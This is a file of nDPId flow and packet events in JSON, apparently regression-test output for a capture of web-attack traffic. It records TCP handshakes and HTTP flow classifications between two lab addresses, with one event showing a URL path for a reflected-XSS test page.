-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3178,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":3,"flow_last_seen":1499347348777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347348777,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0P2pAAD4Ghm6sEAABwKgKMtuwAFBd3mN9I1Y0SoAQAOV7MAAAAQEICgE6XBYD5C2L"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347351299,"flow_last_seen":1499347351299,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347351299,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1499347351299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347351299,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XeBAAD4GZ\/CsEAABwKgKMtvKAFA3cANsAAAAAKACchDoRgAAAgQFtAQCCAoBOl6MAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3191,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":2,"flow_last_seen":1499347351299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347351299,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ28rLt8HDN3ADbaAScSAnxAAAAgQFtAQCCAoD5DACATpejAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":3,"flow_last_seen":1499347351300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347351300,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XeFAAD4GZ\/esEAABwKgKMtvKAFA3cANty7fBxIAQAOXGywAAAQEICgE6XowD5DAC"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347352698,"flow_last_seen":1499347352698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347352698,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1499347352698,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347352698,"pkt":"ABm5CmnxAMGxFOsxCABFAAA894dAAD4GzkisEAABwKgKMtvYAFB9d6htAAAAAKACchD70QAAAgQFtAQCCAoBOl\/qAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3203,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":2,"flow_last_seen":1499347352699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347352699,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ29gsQT\/ffXeobqAScSBbTAAAAgQFtAQCCAoD5DFgATpf6gEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":3,"flow_last_seen":1499347352699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347352699,"pkt":"ABm5CmnxAMGxFOsxCABFAAA094hAAD4Gzk+sEAABwKgKMtvYAFB9d6huLEE\/4IAQAOX6UwAAAQEICgE6X+oD5DFg"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347225590,"flow_last_seen":1499347230679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347225590,"flow_last_seen":1499347230679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54930,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347229416,"flow_last_seen":1499347234681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54970,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347229416,"flow_last_seen":1499347234681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54970,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347230690,"flow_last_seen":1499347236682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54984,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347230690,"flow_last_seen":1499347236682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54984,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347233219,"flow_last_seen":1499347238682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55010,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347233219,"flow_last_seen":1499347238682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55010,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347234469,"flow_last_seen":1499347239682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55024,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347234469,"flow_last_seen":1499347239682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55024,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347163177,"flow_last_seen":1499347230695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232658,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347353987,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54268,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347355229,"flow_last_seen":1499347355229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347355229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1499347355229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347355229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GHxAAD4GrVSsEAABwKgKMtvyAFB7gnofAAAAAKACchApggAAAgQFtAQCCAoBOmJjAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":2,"flow_last_seen":1499347355229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347355229,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2\/L7jmGSe4J6IKAScSCVgwAAAgQFtAQCCAoD5DPYATpiYwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":1499347355230,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347355230,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GH1AAD4GrVusEAABwKgKMtvyAFB7gnog+45hk4AQAOU0iwAAAQEICgE6YmMD5DPY"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3232,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347356478,"flow_last_seen":1499347356478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347356478,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3232,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1499347356478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347356478,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hsZAAD4GPwqsEAABwKgKMtwAAFAJPOVdAAAAAKACchAvRAAAAgQFtAQCCAoBOmObAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3233,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":2,"flow_last_seen":1499347356478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347356478,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3AC\/\/WVQCTzlXqAScSDR3wAAAgQFtAQCCAoD5DURATpjmwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3234,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":3,"flow_last_seen":1499347356478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347356478,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hsdAAD4GPxGsEAABwKgKMtwAAFAJPOVev\/1lUYAQAOVw5wAAAQEICgE6Y5sD5DUR"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347357727,"flow_last_seen":1499347357727,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347357727,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3247,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1499347357727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347357727,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8p9BAAD4GHgCsEAABwKgKMtwOAFCyy8MDAAAAAKACchCmyAAAAgQFtAQCCAoBOmTTAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3248,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":2,"flow_last_seen":1499347357727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347357727,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3A4qYd\/GssvDBKAScSBjUgAAAgQFtAQCCAoD5DZJATpk0wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":3,"flow_last_seen":1499347357728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347357728,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0p9FAAD4GHgesEAABwKgKMtwOAFCyy8MEKmHfx4AQAOUCWgAAAQEICgE6ZNMD5DZJ"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347355229,"flow_last_seen":1499347360034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347360034,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56306,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347360285,"flow_last_seen":1499347360285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347360285,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1499347360285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347360285,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8h\/1AAD4GPdOsEAABwKgKMtwoAFB3hOCvAAAAAKACchDBygAAAgQFtAQCCAoBOmdSAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":2,"flow_last_seen":1499347360285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347360285,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Ci3TdMGd4TgsKAScSD7qAAAAgQFtAQCCAoD5DjIATpnUgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3268,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":3,"flow_last_seen":1499347360286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347360286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0h\/5AAD4GPdqsEAABwKgKMtwoAFB3hOCwt03TB4AQAOWarwAAAQEICgE6Z1MD5DjI"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3275,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347361540,"flow_last_seen":1499347361540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347361540,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56374,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3275,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1499347361540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347361540,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8izFAAD4GOp+sEAABwKgKMtw2AFCL9eO9AAAAAKACchCpAwAAAgQFtAQCCAoBOmiMAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3276,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":2,"flow_last_seen":1499347361540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347361540,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3Db87gPNi\/XjvqAScSBrQAAAAgQFtAQCCAoD5DoCATpojAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":3,"flow_last_seen":1499347361541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347361541,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0izJAAD4GOqasEAABwKgKMtw2AFCL9eO+\/O4DzoAQAOUKRwAAAQEICgE6aI0D5DoC"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3298,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347364056,"flow_last_seen":1499347364056,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364056,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3298,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1499347364056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347364056,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+jlAAD4Gy5asEAABwKgKMtxQAFCMb5E4AAAAAKACchD4fwAAAgQFtAQCCAoBOmsBAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":2,"flow_last_seen":1499347364056,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347364056,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3FBchRpEjG+ROaAScSBCOgAAAgQFtAQCCAoD5Dx3ATprAQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3300,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":3,"flow_last_seen":1499347364057,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347364057,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+jpAAD4Gy52sEAABwKgKMtxQAFCMb5E5XIUaRYAQAOXhQAAAAQEICgE6awID5Dx3"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347235716,"flow_last_seen":1499347241682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347364061,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55038,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 